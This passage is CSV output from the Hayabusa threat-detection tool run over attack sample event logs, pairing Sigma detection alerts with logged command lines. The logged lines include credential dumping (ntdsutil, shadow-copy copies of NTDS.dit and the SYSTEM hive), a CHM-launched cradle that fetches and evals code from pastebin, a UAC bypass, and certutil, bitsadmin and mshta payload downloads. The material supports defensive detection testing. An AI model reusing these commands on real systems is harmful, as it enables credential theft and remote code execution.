Tools,,rules/sigma/process_creation/process_creation_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,medium,Procdump 
Usage,,rules/sigma/process_creation/win_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.686 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.884 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.971 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe create shadow /for=C: : Path: C:\Windows\System32\vssadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c 
""vssadmin.exe create shadow /for=C:""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.082 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:50.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch 
-p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:12:05.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\NOTEPAD.EXE"" C:\AtomicRedTeam\atomics\T1003\T1003.md : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm : Path: C:\Windows\hh.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx -2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,high,HH.exe Execution,,rules/sigma/process_creation/win_hh_chm.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx -2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:""\..\mshtml RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://pastebin.com/raw/y2CjnRtH"",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im out.exe"",0,true);} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx -2019-07-26 16:39:14.935 
+09:00,MSEDGEWIN10,1,high,HTML Help Shell Spawn,,rules/sigma/process_creation/win_html_help_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx -2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx -2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" : Path: C:\Users\IEUser\Downloads\UACBypass.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders : Command: ""C:\Windows \System32\winSAT.exe"" formal : Path: C:\Windows \System32\winSAT.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:42.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6820 324 
0000022557280720 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders : Command: ""C:\Windows \System32\winSAT.exe"" formal : Path: C:\Windows \System32\winSAT.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-30 06:11:17.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\System32\control.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\control.exe"" 
""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\wscript.exe"" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt : Path: C:\Windows\SysWOW64\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp 
Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:32:55.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6336 362 00000298E04230D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:57.633 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c certutil -f -decode fi.b64 AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:58.711 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil -f -decode fi.b64 AllTheThings.dll : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c certutil -f -decode fi.b64 AllTheThings.dll ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.193 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 
-2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.966 
+09:00,MSEDGEWIN10,1,high,Suspicious Bitsadmin Job via PowerShell,,rules/sigma/process_creation/win_powershell_bitsjob.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:04.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:08.318 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 
06:33:13.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.286 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.310 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); : Path: C:\Windows\System32\mshta.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c mshta.exe 
